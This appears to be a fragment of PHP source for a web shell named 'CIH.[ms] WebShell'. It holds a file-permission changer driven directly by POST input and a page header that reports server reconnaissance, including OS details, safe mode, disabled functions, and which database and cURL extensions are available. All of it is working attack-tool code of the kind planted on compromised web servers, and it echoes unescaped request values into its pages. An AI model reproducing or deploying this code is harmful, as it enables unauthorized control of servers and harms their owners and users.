function chmodz($file) { $check = fileperms($file); if (!$check) { echo "<b>chmod error: can`t get current value!</b>"; } else { $form = TRUE; if (isset($_POST["chmod_submit"])) { $chmod_o = $_POST["chmod_o"]; $chmod_g = $_POST["chmod_g"]; $chmod_w = $_POST["chmod_w"]; $octet = trim("0" . base_convert(($chmod_o["r"] ? 1 : 0) . ($chmod_o["w"] ? 1 : 0) . ($chmod_o["x"] ? 1 : 0) . ($chmod_g["r"] ? 1 : 0) . ($chmod_g["w"] ? 1 : 0) . ($chmod_g["x"] ? 1 : 0) . ($chmod_w["r"] ? 1 : 0) . ($chmod_w["w"] ? 1 : 0) . ($chmod_w["x"] ? 1 : 0), 2, 8)); if (chmod($file, octdec($octet))) { $form = FALSE; echo "chmoded " . $file . " to " . $octet . "! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='" . $_POST["dir"] . "'; document.reqs.submit();\">back</a><br><br>"; } else { echo "can't chmod to " . $octet . "! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='" . $_POST["dir"] . "'; document.reqs.submit();\">back</a><br><br>"; } } if (isset($_POST["chmod_string"])) { if (chmod($file, octdec($_POST["string"]))) { $form = FALSE; echo "chmoded " . $file . " to " . $_POST["string"] . "! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='" . $_POST["dir"] . "'; document.reqs.submit();\">back</a><br><br>"; } else { echo "can't chmod to " . $_POST["string"] . "! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='" . $_POST["dir"] . "'; document.reqs.submit();\">back</a><br><br>"; } } if ($form) { $perms = fperms($file, "array"); echo "<br>chmoding " . $file . ": " . view_perms_color($file) . " (" . substr(decoct($check), -4, 4) . ") owned by: <br>" . owner($file) . "<br>\n <br>input string: <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"POST\">\n <input type=\"hidden\" name=\"p\" value=\"f\">\n <input type=\"hidden\" name=\"file\" value=\"" . $file . "\">\n <input type=\"hidden\" name=\"action\" value=\"chmod\">\n <input type=\"hidden\" name=\"dir\" value=\"" . $_POST["dir"] . "\">\n <input type=\"text\" name=\"string\" maxlength=\"4\" size=\"4\" value=\"" . substr(decoct($check), -4, 4) . "\">\n <input type=\"submit\" name=\"chmod_string\" value=\"Save\"></form>"; echo "<br> or select checkboxes:<br><form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"POST\">\n <input type=\"hidden\" name=\"p\" value=\"f\">\n <input type=\"hidden\" name=\"file\" value=\"" . $file . "\">\n <input type=\"hidden\" name=\"action\" value=\"chmod\">\n <input type=\"hidden\" name=\"dir\" value=\"" . $_POST["dir"] . "\">\n <table align=\"left\" width=\"300\" border=\"0\" cellspacing=\"0\" cellpadding=\"5\">\n <tr>\n <td><b>Owner</b><br>\n <input type=\"checkbox\" name=\"chmod_o[r]\" value=\"1\"" . ($perms["o"]["r"] ? " checked" : "") . "> read<br>\n <input type=\"checkbox\" name=\"chmod_o[w]\" value=\"1\"" . ($perms["o"]["w"] ? " checked" : "") . "> write<br>\n <input type=\"checkbox\" name=\"chmod_o[x]\" value=1" . ($perms["o"]["x"] ? " checked" : "") . "> execute\n </td>\n <td><b>Group</b><br>\n <input type=\"checkbox\" name=\"chmod_g[r]\" value=\"1\"" . ($perms["g"]["r"] ? " checked" : "") . "> read<br>\n <input type=\"checkbox\" name=\"chmod_g[w]\" value=\"1\"" . ($perms["g"]["w"] ? " checked" : "") . "> write<br>\n <input type=\"checkbox\" name=\"chmod_g[x]\" value=\"1\"" . ($perms["g"]["x"] ? " checked" : "") . "> execute\n </td>\n <td><b>World</b><br>\n <input type=\"checkbox\" name=\"chmod_w[r]\" value=\"1\"" . ($perms["w"]["r"] ? " checked" : "") . "> read<br>\n <input type=\"checkbox\" name=\"chmod_w[w]\" value=\"1\"" . ($perms["w"]["w"] ? " checked" : "") . "> write<br>\n <input type=\"checkbox\" name=\"chmod_w[x]\" value=\"1\"" . ($perms["w"]["x"] ? " checked" : "") . "> execute\n </td>\n </tr>\n <tr><td><input type=\"submit\" name=\"chmod_submit\" value=\"Save\"></td></tr>\n </table></form>"; } } return TRUE; }
function do_header($f, $auth, $os, $path) { echo '<html><head>'; if (isset($_POST['cmd']) || isset($_POST['alias'])) { echo '<meta http-equiv="Content-Type" content="text/html; charset=cp866">'; } else { echo '<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'; } echo ' <title> CIH.[ms] WebShell </title> <style> body{background:#333; color:#999;font-family:Verdana, Arial;font-size:10px; padding:0px; margin:0px;} .logo {color:#999; font-family:Verdana, Arial; font-size:23px; text-align:left; padding-left:5px; padding-top:0px; margin-bottom:2px;} .m {color:#888;font-family:Verdana, Arial;font-size:10px; text-align:right; width:80px;background:#2c2c2c; border: 0px; border-right:1px solid #444; cursor:pointer; cursor:hand;} .m2 {background:#2c2c2c;color:#999;font-size:10px;font-family:Verdana;border: 0px; padding:3px; width:100%; cursor:pointer; cursor:hand;} .m2:hover {color:#ccc; background:#292929;} .i {color:#555;font-family:Verdana, Arial;font-size:10px; text-align:right;} .notice {background:#252525; padding:4px; margin-bottom:2px;} .footer {font-family:Verdana;font-size:10px; background:#252525; color:#555; padding:4px; border-bottom:1px solid #222; border-left:1px solid #444; border-right:1px solid #444; text-align:center;} .txt {background:#222; border:1px solid #333; color:#999; font-family:Verdana, Arial;font-size:10px; padding:5px;} .butt1 {height:20px; width:20px; padding:2px;border:1px solid #222;background:#333; color:#999; font-family:Verdana, Arial;font-size:10px;} .filet {color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;} .ico {color:#555;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;} .dir { cursor:pointer; cursor:hand;background:#252525;color:#999;font-weight:bold;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center; border:0px;} .file { cursor:pointer; cursor:hand; background:#252525;color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;border:0px; margin:0px;} .file:hover, .dir:hover {color:#ccc;} .str{background:#242424; padding:8px; color:#999; font-size:10px; border-bottom:1px solid #292929; border-top:1px solid #292929; margin-top:15px; text-align:left} .my{background:#252525;color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:left;border:0px;} .form {background:#232323; height:22px; border:1px solid #2e2e2e; width:98%; padding:4px; color:#999; font-family:Verdana, Arial;font-size:10px; } .fm {background:#272727; border:0px; color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px;} .fa {background:#222; color:#888;font-family:Verdana, Arial; font-size:10px; text-align:right; border: 0px; width:100%; height:100%; padding:10px; text-align:center;} .fa1 {background:#222; color:#888;font-family:Verdana, Arial; font-size:10px; text-align:right; border: 0px; width:100%; height:100%; padding:2px; text-align:center;} .fa:hover, .fa1:hover {background:#292929; color:#ccc;} </style> </head> <body><div style="position:absolute; left:0px; top:0px; background:#333; text-align:center; padding-left:100px; padding-right:100px; height:90%"> <div style="background:#222; margin:0px; border-left:1px solid #444; border-right:1px solid #444; padding-left:0px; padding-right:0px;"> <table style="width:100%; height:25px;"> <tr style="background:#2c2c2c;"> <td style="color:#666; font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:left; padding-left:6px;"> cihshell on <b>' . $_SERVER['HTTP_HOST'] . '</b> </td>'; echo "<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='" . $path . "' class='m2'><td class='m'><input type='submit' value='main' class='m2'></td>"; foreach ($f as $k => $v) { echo "\r\n <!-- {$k} -->\r\n <td class='m'><input type='submit' name='do' value='{$v}' class='m2'></td>\r\n "; } if ($auth) { echo "<td class='m'><input type='submit' name='do' value='logout' class='m2'></td>"; } $disfun = ini_get('disable_functions'); $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = 'Off'; } else { $safe_mode = 'On'; } $mysql_try = function_exists('mysql_connect'); if ($mysql_try) { $mysql = 'On'; } else { $mysql = 'Off'; } $pg_try = function_exists('pg_connect'); if ($pg_try) { $pg = 'On'; } else { $pg = 'Off'; } $mssql_try = function_exists('mssql_connect'); if ($mssql_try) { $mssql = 'On'; } else { $mssql = 'Off'; } $ora_try = function_exists('ocilogon'); if ($ora_try) { $ora = 'On'; } else { $ora = 'Off'; } $curl_try = function_exists('curl_version'); if ($curl_try) { $curl = 'On'; } else { $curl = 'Off'; } $perms = fperms($path); echo ' </tr> </table> <table style="width:100%; margin-top:5px;"><tr> <td class="logo" style="width:120px;">CIH.<span style="color:#555">[</span><span style="color:#888">ms</span><span style="color:#555">]</span></td> <td class="i" style="padding-right:5px; text-align:right;"> <nobr><b style="color:#666"><i>' . $perms . '</i></b> <span style="color:#333">|</span></nobr> <nobr>OS: <b>' . php_uname() . '</b> <span style="color:#333">|</span></nobr> <nobr>safe mode: <b>' . $safe_mode . '</b> <span style="color:#333">|</span></nobr> <nobr>cURL: <b>' . $curl . '</b> <span style="color:#333">|</span></nobr> <nobr>MySQL: <b>' . $mysql . '</b> <span style="color:#333">|</span></nobr> <nobr>MSSQL: <b>' . $mssql . '</b> <span style="color:#333">|</span></nobr> <nobr>PostgreSQL: <b>' . $pg . '</b> <span style="color:#333">|</span></nobr> <nobr>Oracle: <b>' . $ora . '</b> <span style="color:#333">|</span></nobr> PHP: <b>' . phpversion() . '</b> </td> </tr></table> <div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:5px;"> </div>'; if (!empty($disfun)) { echo '<div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:10px; color:#666; text-align:right; padding:5px;"><b>disabled functions: </b>' . $disfun . '</div>'; } }